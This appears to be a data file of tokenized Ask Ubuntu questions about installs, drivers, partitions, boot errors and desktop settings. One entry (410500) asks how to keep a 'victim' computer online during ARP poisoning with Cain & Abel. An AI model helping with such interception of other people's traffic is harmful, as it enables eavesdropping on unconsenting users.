410410	node.js application is not working arm ubuntu	i use a samsung arm chromebook as a dev machine , and as a result node.js is absolutely essential . in the past i 've had no issues with it whatsoever . however , due to unfortunate circumstances i was recently forced to wipe my computer and start fresh . when i followed the same installation steps for node.js as i always have ( add the chris-lea ppa for the latest version ) , i did n't encounter any errors . however , when i type in node and nodejs , node does not start . nothing executes . oddly , node -- version returns what it should , v0.10.25 . is this an issue with the latest build of node ? how can i install an older one if that 's the case ?
410415	how to restore ambience icons ?	i uninstalled dropbox and in the process manually removed ambiance and radiance action bar dropbox icons ( i thought they were part of the dropbox install but i guess not ) . how can i restore these icons ?
410418	suddenly unable to boot , stuck at 'stopping save udev log '	everything was normal until a while back , but i just booted my computer and i 'm getting the screen below . it hangs/freezes here , and i 've no clue what to do . any ideas ?
410419	how to set the default workspace ?	lets say i have 9 workspace 3 horizontally and 3 vertically . by default ubuntu starts with the top left workspace which feels goofy . how do i set to start with the middle one ?
410422	can not install ubuntu sdk	i get the following error in terminal while installing the sdk w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey f141b5f0c7122f9b w : failed to fetch gzip : /var/lib/apt/lists/partial/ppa.launchpad.net_ubuntu-sdk-team_ppa_ubuntu_dists_precise_main_i18n_translation-en % 5fin encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead .
410425	unable to install ubuntu 13.10	i created a 18 gb unallocated partition for ubuntu from windows 7 by shrinking a drive , the unallocated space is just after the c : \ drive . i then started ubuntu 13.10 from a live usb , to the place where we can select `` install ubuntu alongside windows 7 . '' but in my case the option was `` install ubuntu inside windows 7 '' , after selecting it when i pressed 'continue ' , the process just restarted instead of going forward . i am using a 32-bit lenovo g580 .
410429	installation of i386 deb ( hangul 2008 ) into amd64 architecture ; dpkg/library error - 2	this question is 2nd question following previous one posted but regarding installing 32bit library on 64amd system of 13.10 from the first question , as avinash raj told i finished installing deb packages . next , i tried to run this with hwp7 command but it showed bash : ./hwp7 : no such file or directory but that file existed in specified folder as excutable , so i searched for the symptom and found this link that i should install libraries for 32bit . so i tried to install this ia32-libs package but got this results user @ chrubuntu : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate user @ chrubuntu : ~ $ so i installed recommended alternative libs and ran hwp7 again and it showed this ( thank got ! it finally told me what is missing in detail , though still error ... ) user @ chrubuntu : ~ $ hwp7 hwp7 : error while loading shared libraries : libxfixes.so.3 : can not open shared object file : no such file or directory user @ chrubuntu : ~ $ i searched for library package that include this libxfixed.so.3 file in debian and ubuntu sites and instead of dpkging it , extracted this files and copied only needed file into the library folder of hwp7 ( hangul 2008 ) program , and made a soft link from /usr/lib to /usr/lib/haansoft/lib ( reason was that other guys who succeeded told direct installation of this 32bit packages into 64bitamd could mess up or destroy the library system . ) and ... the problem is that this kind of missing packages and search and extraction and link repeated and repeated ... for 3hours . these are list of libraries i downloaded . /home/user/downloads/libssl0.9.8_0.9.8o-7ubuntu3.1_i386 /home/user/downloads/libgcc1_4.7.2-5_i386 /home/user/downloads/libstdc++6_4.4.5-8_i386 /home/user/downloads/libgconf-2-4_3.2.5-1+build1_i386 /home/user/downloads/libfreetype6_2.4.9-1.1_i386 /home/user/downloads/libx11-6_1.5.0-1+deb7u1_i386 /home/user/downloads/libfontconfig1_2.9.0-7.1_i386 /home/user/downloads/libxrender1_0.9.7-1+deb7u1_i386 /home/user/downloads/libxft2_2.3.1-1_i386 /home/user/downloads/libcups2_1.5.3-5+deb7u1_i386 /home/user/downloads/libglib2.0-0_2.33.12+really2.32.4-5_i386 /home/user/downloads/libexif12_0.6.20-3_i386 /home/user/downloads/libpng12-0_1.2.49-1_i386 /home/user/downloads/libxml2_2.8.0+dfsg1-7+nmu2_i386 /home/user/downloads/libcairo2_1.12.2-3_i386 /home/user/downloads/libpango1.0-0_1.30.0-1_i386 /home/user/downloads/libgdk-pixbuf2.0-0_2.28.2-1+b1_i386 /home/user/downloads/libatk1.0-0_1.30.0-0ubuntu2_i386 /home/user/downloads/libgtk2.0-0_2.24.10-0ubuntu6_i386 installing this packages with : i386 command does not work . user @ chrubuntu : ~ $ sudo apt-get install libstdc++6 : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libstdc++6 e : could n't find any package by regex 'libstdc++6' user @ chrubuntu : ~ $ should i continue this tedious search , download , cp , linking libraries ; or is there any command to install 32bit shared libraries at once or figure out missing libraries for running hwp7 ( hangul 2008 ) ? first question . installation of i386 deb ( hangul 2008 ) into amd64 architecture ; dpkg/library error
410431	completely remove windows 7 and install ubuntu	i have installed dual boot windows 7 and ubuntu . now i 'm totally into ubuntu . i found i just have to simply delete the windows 7 by using `` disk utility '' in ubuntu . i did it . then i wanted to spread my ubuntu os to the those partitions as well . then i find a good video tutorial . it says to use `` gparted '' . so i 'm going to use it . but when i 'm checking my hard disk data usage by using disk utility , i 'm a bit confused how to extend the hard disk space for ubuntu . it shows several partitions . i want to clarify which partitions i should add to ubuntu . so i have attached a snapshot of my hard disk data usage . please help me on this .
410432	problem in installing tinyos on ubuntu	i am facing a problem during the installation of tinyos i.e. , in terminal it is showing like this : err http : //archive.ubuntu.com/ubuntu/ saucy-updates/universe openjdk-6-jre-lib all 6b27-1.12.6-1ubuntu2.1 connection failed [ ip : 91.189.92.201 80 ] err http : //tinyos.stanford.edu/tinyos/dists/ubuntu/ lucid/main avr-binutils-tinyos i386 2.17-20110726 connection failed my internet is working fine at the time of installation can u give me a solution to this problem
410433	acer aspire z5101 realtek network card not connecting after resuming from suspend mode	i have a problem with my realtek network card not connecting after resuming from suspend mode . ubuntu 13.10 realtek network card using the r8712u driver on an acer aspire all in one z5101 , any help appreciated . this is the fix for this machine here is a technique that sometimes works : gksudo gedit /etc/pm/config.d/config add a single line : suspend_modules= '' r8712u '' proofread , save and close gedit . reboot , suspend and let us have your report . for me the driver is r8712u . you find the driver by sudo lshw -c network the line driver = 'the driver ' , the driver is what you use in that line suspend_modules= '' the driver ''
410435	wacom intuous pen ctl-480 ( pen small )	can not install drivers wacom tablet not working under 13.10 on acer aspire all in one , any help installing drivers appreciated , wacom tablet ctl-480 ( pen small )
410438	how do i get the ath9k driver of backports-3.12-8 installed on xubuntu 13.10 ?	i downloaded the 3.12-8 kernel files linux-headers-all.deb , linux-headers-generic_i368.deb ; linux-image-generic_i386.deb from kernel.org and installed them via : dpkg -i *.deb now i 'm trying to eliminate some wifi signal dropouts , which are probably caused by the driver itself . apparently there have been some fixes to the ath9k driver , so i 'd like to replace the default by a backports version . i downloaded backports-3.12.8-1.tar.gz from kernel.org and tried to get the ath9k module ready by : cd ~/.source/backports-3.12.8-1/ sudo apt-get install build-essential sudo apt-get build-dep linux-image- $ ( uname -r ) sudo ln -s /usr/src/linux-headers- $ ( uname -r ) /usr/src/linux make defconfig-ath9k this leaves me with following `` missing-prototypes error '' : cc -wall -wmissing-prototypes -wstrict-prototypes -o2 -fomit-frame-pointer -c -o conf.o conf.c cc -wall -wmissing-prototypes -wstrict-prototypes -o2 -fomit-frame-pointer -c -o zconf.tab.o zconf.tab.c cc conf.o zconf.tab.o -o conf but when i continue with : sudo modprobe -r ath9k sudo make sudo checkinstall everything works ! ! ! so my questions are : does this module depend on certain other kernel modules ? yes following command does tell you : modinfo ath9k if so , where 's information about that stuff ? have a look at wireless.kernel.org/en/users/drivers/ath9k . is there a right way to install this kernel module resp . driver ? probably by getting a pro in kernel compiling : - ) . thx
410442	totem player not launching	the totem player does not launch on ubuntu 12.10 . it used to play , but not anymore . i have tried to launch it from the menu or tried to play videos or audio files .
410446	error make : *** no targets specified and no makefile found . stop after make openjdk-7-7u51-2.4.4.orig	7-7u51-2.4.4.orig and type make in terminal show error in ubuntu 12.04 lts make : * no targets specified and no makefile found . stop . pls help me tanx
410449	what can one do so that the administrator password could not be resetted ?	this question provides ways to reset admin password if it is lost.but i think it is also a major security threat as there is practically no barrier in a data theft and data in one 's pc once the theft gets access to the pc . so i want to know if there is any possible procedure by which one could block the feature of recovering password , so that the data remains secure . alternately , there should some way by which we could assign certain important data to be deleted ( shredded ) when the password is recovered .
410451	ubuntu 12.04 php5.3 opcache.so installtion problem	i got this error when i call php -v failed loading opcache.so : opcache.so : can not open shared object file : no such file or directory php 5.3.10-1ubuntu3.9 with suhosin-patch ( cli ) ( built : dec 12 2013 04:27:25 ) copyright ( c ) 1997-2012 the php group zend engine v2.3.0 , copyright ( c ) 1998-2012 zend technologies anybody has a solution to fix this problem ? ! i ca n't find something on the the net ! ! !
410452	allocate free space to ubuntu partition with 4 primary already existing ?	i just made 120 gb of unallocated space from my windows 8 partition to put into my already existing ubuntu home ( sda7 ) partition . the problem is when i try to create new partition from unallocated it says it is not possible to create more than 4 primary partitions all i want to do is put that free space into my ubuntu ( to sda7 ) . sda2 - windows 8 drive c sda3 - windows 8 drive d edit : so i run `` try ubuntu '' , unmounted all partitions , and resized /dev/sda4 so unallocated space is not below sda4 . but when i try to resize /dev/sda7 ( which i want ) it only allows me to resize for 7gb or so , not all 120gb i need .
410453	what type of linux operating system would you offer for this notebook configuration	first , i am really sorry but i am a big beginner with linux . i have searched the net for an answer but did not find anything . the reason why i would like to use linux is im sick and tired of windows , and i am a web developer and saw / heard lot of people offer linux for web development purposes , and my experience is the same . so me config is a hp compaq duo 615 videocard : ati mobility radeon 3200 cpu : amd athlon ( tm ) x2 dualcore ql-66 , 2200 mhz memory : 1gb ddr3 sorry really for asking this noob question but i am a noob , i tried ubuntu 12.10 but the problem was i was not able to install my videocard driver . i tried numerous ways but no luck and gnome3 uses a lot of reasource and my cpu used 50-60 % while no applications where running . so if someone could offer me something would be great if its not a big request . thank you
410459	ca n't open menus in eclipse	i am using ubuntu 13.10 and successfully installed the latest version of eclipse , but when i run it , i ca n't open menus like file , edit , run , etc . why is this and what i should do to solve this problem ?
410460	`` disk drive is not ready yet or not present '' after renaming partition	ok so , here 's the thing . i have an 256gb ssd and a 2tb hdd in my system . i had windows 7 on the ssd until a couple of days ago and ubuntu on a partition on my hdd . not so familiar with ubuntu btw , just getting into it . i had some issuse with windows so i decided to switch to ubuntu full time , but i needed to keep windows for some essential software . ok , main story now . ubuntu on ssd , no problem . had windows on a partition on the hdd , but it did n't boot . at this point i already switched to ubuntu and made both partitions of the hdd , the storage one and the windows one , auto-mount on startup . i did this through the `` disks '' application ( program ? idk , new to ubuntu ) . when i realized windows wo n't boot , i went to gparted , formated the partition , deleted it , recreated it and reinstalled windows on it , but i changed the name of the partition from `` new volume '' to `` windows '' . apparently , the setting that auto-mounts `` new volume '' is still active and it 's trying to mount a drive that no longer exists since i 'm getting that message before startup . how can i fix this ? is there some way i can see the list of auto-mounting drives in the terminal so i can delete them ? i 've googled for about 2 hours with nothing similar to my situation so i came here . sorry if it 's already been answered somewhere . thanks in advance . edit : natkoui @ natko-ubuntu : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 noatime , errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=7786039f-4196-4d35-a746-35a2d2521e76 /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 /dev/disk/by-uuid/84deff8bdeff7430 /media/natkoui/new\040volume auto nosuid , nodev , nofail , x-gvfs-show 0 0 /dev/disk/by-uuid/64e66d6ae66d3d84 /media/natkoui/storage auto nosuid , nodev , nofail , x-gvfs-show 0 0 /dev/disk/by-uuid/295e2e3f4411e9c2 /media/natkoui/windows auto nosuid , nodev , nofail , x-gvfs-show 0 0
410461	my user name and password are correct but still cant sign in to ubuntu 13.10	i am able to log in to ubuntu 13.10 only as a guest user . i am unable to use my user name and password . i have uninstalled and re-installed ubuntu 13.10 several times , created new user name and passwords during installation , but every time i log in with my user name and password , it says : password incorrect . moreover , when i sign in as a guest user , i am asked for a password to access my drives , and even here the password i provide does not work .
410462	backup wii games	what software should i use to backup wii games ? i found this tutorial , but it did n't work . i may try to download wiibafu directly and install deb .
410464	removing wine entirely	how can i remove wine entirely from ubuntu 13.10 ? i have tried sudo apt-get autoclean wine sudo apt-get remove wine sudo apt-get clean wine but wine has not been removed yet .
410465	my xdiagnose does not work ?	when i click on the application , the application does not run or is not visible . how can i get this to work ?
410469	what shifts my entire screen when i log in ?	i was trying out compizconfig settings manager and after a while i noticed that my screen is shifted about 5 pixels to the top left direction . so at the right and bottom i have a 5 pixel wide black area . i guess some compizconfig feature messed it up . if i log in as guest , everything is fine , so the problem is localized to my account . i tried deleting config files , but it didnt help : rm ~/.gconf ~/.gconfd ~/.metacity ~/.compiz-1 ~/.config/compiz-1 ~/.config/dconf -rf additional information : xrandr returns : screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 4096 x 4096 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) vga-1 **connected 1280x1024+0+0** ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0 + 75.0* 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 tv-1 disconnected ( normal left inverted right x axis y axis ) i have no idea what causes this , but it is very annoying because i ca n't see on launcher , which programs are running . i have hope , because for the guest it works , maybe i just need to delete more config files ? or purge compiz and reinstall it ? ?
410478	brightness not changing after plugging back the charger	when the charger is plugged in the brightness is at its max . when i remove the charger the brightness become 0 . when i plug back the charger the brightness stay 0 . so i must change it manually . i think it 's a problem in my pc ( i had the same problem on windows ) . i 'm sure that we can fix the problem with script but i do n't know how to do it . could someone help me . thanks in advance .
410479	launching ros software	i have installed ros ( robotic operating system ) in ubuntu 12.04 . i have a problem launching this program . how can i launch it ?
410483	trying to install burg bootloader . /boot/burg/burg.cfg missing	i am using the grub customizer gui but i ca n't get it to work . i get this error message : burg-mkconfig could n't be executed successfully . error message : generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . i am not sure how to fix it .
410485	how do i clean install windows 7 on the `` other '' partition ?	i would like to cleanly install windows 7 on another partition to ubuntu 12.04 . i originally had a windows 7 only machine . i subsequently installed ubuntu 12.04 alongside it by creating a partition . windows 7 now seems to be corrupted - when it starts loading it eventually shows a blue screen with what looks like a memory related error message . the boot loader ( if that is the right terminology ) appears to be working as i can get into ubuntu fine , and windows does start to load . i am confused about what hard drives and partitions i actually have , and where each os is . i am not even sure if i have one or two physical hard drives . here are screenshots of my drives / partitions . i have a windows 7 cd ( came with my pc ) . what do i need to do to get windows 7 working again ? fyi : i am not experienced with partitioning , nor massively experienced with windows nor linux . however , i do have a few years of coding experience .
410487	blank screen with x shape pointer after installing ubuntu 13.10	installed ubuntu and it was showing low graphics so updated by the command sudo apt-get install fglrx as told in how to fix `` the system is running in low-graphics mode '' error ? now screen shows only blank screen.with x shape pointer.what to do now ? my laptop hp n003tx
410488	lenovo tp x230 + series 3 docking - toggle between dvi and dp working ?	hi , is anyone using dvi and dp of the series 3 docking with ubuntu ? for now i 'm using dvi for my monitor and i plan to use dp to connect to my tv ( dp - > hdmi - > tv ) . lenovo says it is n't possible to use dvi and dp simultaneous , but is it possible ( and working with ubuntu 13.10 ) to switch between dvi and dp within the running system ?
410493	identify and install wireless driver	i have just bought this and put ubuntu on it . the wired internet connection works fine , but i have no option for wireless even though there is a built in wireless card . can you help me dentify the card , and find an ubuntu driver for it ? here is some detailed information about . when i typed lsusb i got this bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 064e:9301 suyin corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub when i typed iwconfig wlan1 i got : wlan1 no such device when i typed lspci i got : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 network controller : realtek semiconductor co. , ltd. device 8179 ( rev 01 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) when i typed iwconfig i got : eth0 no wireless extensions . lo no wireless extensions . when i typed lshw -c network i got : pci ( sysfs ) *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : ioport:4000 ( size=256 ) memory : c2500000-c2503fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 07 serial : a0:1d:48 : d1:96:66 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-1_0.0.1 06/29/12 ip=192.168.0.26 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:3000 ( size=256 ) memory : c2404000-c2404fff memory : c2400000-c2403fff memory : afb00000-afb0ffff when i typed sudo modprobe iwlwifi & & dmesg | grep iwl i got : absolutely nothing ( no errors ) . what wireless card does my computer have ? where can i find a driver for ubuntu for it ?
410494	amd dual graphics	my laptop is acer aspire 4745g with dual graphics intel/amd . discrete card is mobility radeon hd 5430/5450/5470 . i 'm using ubuntu 13.10 now . one day i mentioned that my discrete amd graphics card is not working , after some googling i found a way how to check it and command fglrxinfo gave me x error of bad request . and so started my big quest for trying to make it work . i tried so many ways from google but no one of them really helped - i still ca n't use discrete card . i would n't even want to be able to switch them - i just want a discrete one work . the last one i tried is installing driver from official site . ok , so i installed it with sudo sh ./amd*.run , it processed and gave me dkms error in the end or smth like that . after that i rebooted and got a message that system could n't detect drivers and so on . so my question is : how do i install drivers for my graphics card now , in 2014 ?
410495	python interactive interpreter : initial tab is 4 , subsequent tabs are 8 spaces	when i use the interactive python interpreter , the width of the tabs seem out of sync with each other . specifically , the first tab gives me a tab width equivalent to 4 spaces , while the next tabs are 8 spaces wide . is there a configuration file that i need to change , or some environment variable that needs to be set ? i 'm using python 2.7.3 on elementary os 0.2 'luna ' , but i also had the same problem when using the python interpreter in ubuntu 13.04 ( python version 2.7.5 , i think ) .
410498	grub rescue no file error	i installed ubuntu 13.04 along side windows 8 it works fine . when i just use ubuntu only but once i restart and use windows and then switch off and again switch on something error displays with grub rescue and nothing more no ubuntu no windows only black . i need help i have just begin using it i have n't tried anything .
410499	make setxkbmap preferences being set at startup	i 'm trying to switch left ctrl key with caps permanently . but with ubuntu native keyboard layout switcher xmodmap did not persisted ( this question ) . so now i just ditched native switcher and using setxkbmap command instead . i created a script : # ! /bin/bash setxkbmap -model pc104 -layout us , ru -option grp : alt_shift_toggle -option ctrl : swapcaps it works just as i want to . but now i want to auto run it on system start up . but if i put this under sturtup applications it does not work . apparently something else resets xkb map after my script at start up . does anyone know what triggers reset of xkb and how to get rid of it ?
410500	internet interrupts when using cain & abel on network	i am quite new to these networking . when i start apr poisoning using the cain and abel user interface ; then the internet connection in the other computer goes off . so without the internet connection how can the victim computer work ? is there any other way to tackle this problem ( not to render the victim computer without internet ) ? thank you for help in advance .
410502	ca n't connect to network with tl-wn722n ( ar9271 ) usb adapter	i already tried couple guides to solve my problem , but still i am not able to connect with my tl-wn722n to wifi network . device is up and recognized . joe @ g580 : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 09da:000e a4 tech co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0cf3:9271 atheros communications , inc. ar9271 802.11n bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 002 device 003 : id 174f:1468 syntek joe @ g580 : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off joe @ g580 : ~ $ sudo lshw -c network [ sudo ] password for joe : *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : xx : xx : xx : xx : xx : xx size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.1.31 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : d3900000-d393ffff ioport:2000 ( size=128 ) *-network disabled description : wireless interface physical id : 3 bus info : usb @ 1:1.2 logical name : wlan0 serial : xx : xx : xx : xx : xx : xx capabilities : ethernet physical wireless configuration : broadcast=yes driver=ath9k_htc driverversion=3.8.0-35-generic firmware=1.4 link=no multicast=yes wireless=ieee 802.11bgn joe @ g580 : ~ $ rfkill list 0 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no so i already installed drivers and firmware . i tried to install win drivers with ndiswrapper , but i got an error message that ndiswrapper is not installed ( solving this issue is in progress ) . this device was working before i had to reinstall ubuntu 12.04 . now i can see avaible wifi networks , but i 'm not able to connect to any of them . when i try to connect to wifi network , it 's still trying to connect again and again but it fails every time . i 'm looking for your advices ( i 'm really desperate now ! ) thanks !
410503	transfer skype history from windows to ubuntu	is there any way to transfer my history from my windows skype app to skype in ubuntu ?
410505	thinkpad_acpi.h missing from /usr/include/linux	i have a strange issue with saucy , that can not figure out . i usually patch the kernel with a well-known patch for lenovo mic mute led . however since latest kernel updates , i 've lost the header file /usr/include/linux/thinkpad_acpi.h which is needed for the patch to compile . as i see in kernel packages - the file should exist in linux-kernel-headers , but when i try to install it , i get the message : note , selecting 'linux-libc-dev ' instead of 'linux-kernel-headers' and in linux-libc-dev the file is missing . can someone explain how and when linux-libc-dev replaced linux-kernel-headers , and why the header file thinkpad_acpi.h is missing there ?
410508	i have an invisible icon in my launcher	i created a desktop shortcut using this command : `gnome-desktop-item-edit 窶田reate-new ~/desktop` then i thought it would be a great idea to see if i can drag the icon onto the launcher . i tried twice in order to manage . unfortunately now i have the icon i wanted originally , plus an empty space onto my launcher which , when i rollover , says `` drop to add application '' . i removed the original icon , but the empty space remains . btw , nothing happens when i click on the empty space . ah , this is the first time i am using ubuntu , i fell in love with it , but now i have a feeling my new operating system is too fragile to play around with , and even worse , i get a feeling of helplessness : ) complex feelings associated with an os : ) please help , i would hate to have to reinstall the whole think again !
410509	how to make ubuntu 13.10 a wi fi router	i just install ubuntu 13.10 , i hope i can make my laptop , which is connected to internet by a cable , as a wifi router . i just googled for some ideas , i find a huge access to this topic , i read several articles and i tried several ways , but non of them succeed . what i need is just some steps to do either by terminal or by creating a new wifi network . i usually use my phone , android samsung ace to check if my new network works properly . thanks very much , any suggestion would be highly appreciated .
410510	3g modem recognized as cd rom	how can i identify whether a usb 3g dongle was recognized as a cd rom or modem ? how can i switch to modem mode in case it was recognized as cd rom ?
410519	problem with apt-get update gpg error : http : /dl.google.com the following signatures were invalid : nodata 1 nodata 2	i am unable to install anything with apt-get . i think this problem is due to gpg error of some kind . i have done almost everything on the net as per my belief . this is what happens when i run apt-get update . mody @ ubuntu : ~ $ sudo apt-get update get:1 http : /dl.google.com stable release.gpg get:2 http : /dl.google.com stable release ign http : /dl.google.com stable release e : gpg error : http : /dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 mody @ ubuntu : ~ $ i tried these mody @ ubuntu : ~ $ sudo apt-get clean mody @ ubuntu : ~ $ sudo apt-get update & & sudo apt-get upgrade get:1 http : /dl.google.com stable release.gpg get:2 http : /dl.google.com stable release ign http : /dl.google.com stable release e : gpg error : http : /dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 did n't work mody @ ubuntu : ~ $ sudo apt-get update -o acquire : :http : :no-cache=true get:1 http : /dl.google.com stable release.gpg get:2 http : /dl.google.com stable release ign http : /dl.google.com stable release e : gpg error : http : /dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 did n't work mody @ ubuntu : ~ $ sudo apt-get update -o acquire : :brokenproxy=true get:1 http : /dl.google.com stable release.gpg get:2 http : /dl.google.com stable release ign http : /dl.google.com stable release e : gpg error : http : /dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 mody @ ubuntu : ~ $ even this click system > > administration > > software sources click the download from menu and choose main server type the following in terminal . sudo apt-get update run the update manager again . but did not work i also changed the sources with one available on ubuntu site . i dont know why i did that but that did n't help did a force update . problem persists . mody @ ubuntu : ~ $ sudo apt-get update -f [ sudo ] password for mody : get:1 http : /dl.google.com stable release.gpg get:2 http : /dl.google.com stable release ign http : /dl.google.com stable release e : gpg error : http : /dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 frustrated . synaptic is not installed as well as aptitude . changing download server to everything possible from anything did not help either . ps : link were giving me problem with posting so i delete '/ ' where '// ' were present solved as @ arhimed suggested i did system > > admin > > software sources and on the tab 'other software ' unchecked everything with dl.google.com could not have guessed it was asking to update chrome but was failing every time . thanks every one for their quick support
410525	change keyboard layout in gnome 3.10	i am now running gnome 3.10 but have no idea , how to switch the keyboard layout ( i have a mac ) there . previously it was under keyboard but the seem to have scraped that . does anyone know where to switch the keyboard layout ?
410531	can not change swappiness default from 60 to 0 in ubuntu 12.04	so i 've read several related threads and there seems to be no answer . i have an old laptop , with a dual core 1.7 ghz processor and added 2 gb of ram , with a 30 gb partition for ubuntu 12.04 and the remaining for windows xp . i want to change the default swappiness from 60 to 0 . when i start the computer and run cat /proc/sys/vm/swappiness in terminal i get the value 60 . i have no problems changing it to 0 with sudo sysctl vm.swappines=0 i have tried several times changing the file /etc/sysctl by adding at the end # # vm.swappiness=0 but every time i restart my computer the value given by cat /proc/sys/vm/swappiness is still 60 . any ideas as to how to fix this ? thanks
410534	what is the default desktop environment for ubuntu 13.10 ?	i am trying to find out what is called the default desktop environment for ubuntu 13.10 . is it gnome and if so , what version of gnome does ubuntu 13.10 come with ?
410540	nvidia 331 ubuntu 13.10 can not be installed properly	i tried to install 331 nvidia drivers instead of 319 which is the default option in the drivers sources.when i rebooted my laptop i message appears telling me that ubuntu is running in low mode graphics.i installed the 331 in a linux mint 16 system and everything worked.is there any solution why the 331 drivers cant work properly under my ubuntu 13.10 ?
410542	problem installing sctk 2.4.0 on ubuntu 13.10	i 'm trying to install sctk 2.4.0 on ubuntu 13.10 with gcc 4.8.1 installed on my system but i get this error after i run `` make all '' command : in file included from main.cpp:20:0 : recording.h:122:29 : error : âfilter : :filterâ can not appear in a constant-expression map < string , filter : :filter* > filters ; ^ recording.h:122:36 : error : template argument 2 is invalid map < string , filter : :filter* > filters ; ^ recording.h:122:36 : error : template argument 4 is invalid make [ 3 ] : *** [ main.o ] error 1 make [ 3 ] : leaving directory `/home/acl/downloads/sctk-2.4.0/src/asclite/core' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/acl/downloads/sctk-2.4.0/src/asclite' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/home/acl/downloads/sctk-2.4.0/src' make : *** [ all ] error 2 what could i do to install this tool ?
410543	how to add bluetooth icon on gnome-shell panel 3.10 ? ( 13.10 gnome ubuntu )	how can i add an option ( like 3.8 menu for example ) on panel to turn on/off/settings bluetooh conection on gnome 3.10 ?
410545	how do you use the command trap in a command-line ?	i would like to know what exactly the trap command is and how it is used in the terminal . i came across this in the command line help .
